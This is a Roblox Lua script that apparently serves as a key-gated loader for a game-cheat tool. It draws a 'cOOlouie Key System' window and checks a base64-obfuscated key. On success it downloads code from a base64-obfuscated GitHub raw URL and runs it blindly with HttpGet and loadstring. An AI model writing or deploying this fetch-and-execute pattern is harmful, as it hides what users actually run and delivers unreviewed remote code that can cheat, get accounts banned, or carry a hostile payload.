local player = game.Players.LocalPlayer
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "HiddenKeySystem"
gui.ResetOnSpawn = false

local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0, 350, 0, 200)
frame.Position = UDim2.new(0.5, -175, 0.5, -100)
frame.BackgroundColor3 = Color3.fromRGB(245, 245, 245)
frame.BackgroundTransparency = 1
Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 16)

local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, 0, 0, 30)
title.Text = "cOOlouie Key System"
title.BackgroundTransparency = 1
title.TextColor3 = Color3.fromRGB(40, 40, 40)
title.Font = Enum.Font.GothamBold
title.TextSize = 22

local close = Instance.new("TextButton", frame)
close.Size = UDim2.new(0, 30, 0, 30)
close.Position = UDim2.new(1, -35, 0, 5)
close.Text = "X"
close.BackgroundColor3 = Color3.fromRGB(255, 100, 100)
close.TextColor3 = Color3.new(1, 1, 1)
close.Font = Enum.Font.GothamBold
close.TextSize = 18
Instance.new("UICorner", close).CornerRadius = UDim.new(0, 8)

local input = Instance.new("TextBox", frame)
input.PlaceholderText = "Enter key..."
input.Size = UDim2.new(0.8, 0, 0, 35)
input.Position = UDim2.new(0.1, 0, 0.45, 0)
input.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
input.TextColor3 = Color3.fromRGB(0, 0, 0)
input.Font = Enum.Font.Gotham
input.TextSize = 18
input.ClearTextOnFocus = false
Instance.new("UICorner", input).CornerRadius = UDim.new(0, 8)

local submit = Instance.new("TextButton", frame)
submit.Size = UDim2.new(0.8, 0, 0, 35)
submit.Position = UDim2.new(0.1, 0, 0.7, 0)
submit.Text = "Submit"
submit.BackgroundColor3 = Color3.fromRGB(0, 170, 0)
submit.TextColor3 = Color3.new(1, 1, 1)
submit.Font = Enum.Font.GothamBold
submit.TextSize = 18
Instance.new("UICorner", submit).CornerRadius = UDim.new(0, 8)

local result = Instance.new("TextLabel", frame)
result.Size = UDim2.new(1, 0, 0, 25)
result.Position = UDim2.new(0, 0, 1, 0)
result.Text = ""
result.TextColor3 = Color3.new(1, 0, 0)
result.BackgroundTransparency = 1
result.Font = Enum.Font.Gotham
result.TextScaled = true

for i = 1, 10 do
	frame.BackgroundTransparency = 1 - (i * 0.1)
	task.wait(0.03)
end

local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
local function base64decode(data)
	data = string.gsub(data, '[^'..b..'=]', '')
	return (data:gsub('.', function(x)
		if x == '=' then return '' end
		local r, f = '', (b:find(x) - 1)
		for i = 6, 1, -1 do
			r = r .. (f % 2^i - f % 2^(i - 1) > 0 and '1' or '0')
		end
		return r
	end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
		if #x ~= 8 then return '' end
		local c = 0
		for i = 1, 8 do
			c = c + (x:sub(i, i) == '1' and 2^(8 - i) or 0)
		end
		return string.char(c)
	end))
end

local encodedKey = "aGVsbGNs" -- "hellcl"
local key = base64decode(encodedKey)
local encodedURL = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xvdWllQ0xFL0NMZS9yZWZzL2hlYWRzL21haW4vQ0xFJTIwdjEuMQ==" 
local url = base64decode(encodedURL)

local function fadeOutAndDestroy()
	for i = 1, 10 do
		frame.BackgroundTransparency = i * 0.1
		task.wait(0.03)
	end
	gui:Destroy()
end

submit.MouseButton1Click:Connect(function()
	if input.Text == key then
		result.TextColor3 = Color3.fromRGB(0, 200, 0)
		result.Text = "Key Accepted"
		task.wait(5)
		local success, resultScript = pcall(function()
			return game:HttpGet(url, true)
		end)
		if success then
			pcall(function()
				loadstring(resultScript)()
			end)
		end
		fadeOutAndDestroy()
	else
		result.TextColor3 = Color3.new(1, 0, 0)
		result.Text = "Invalid Key"
	end
end)

close.MouseButton1Click:Connect(function()
	fadeOutAndDestroy()
end)
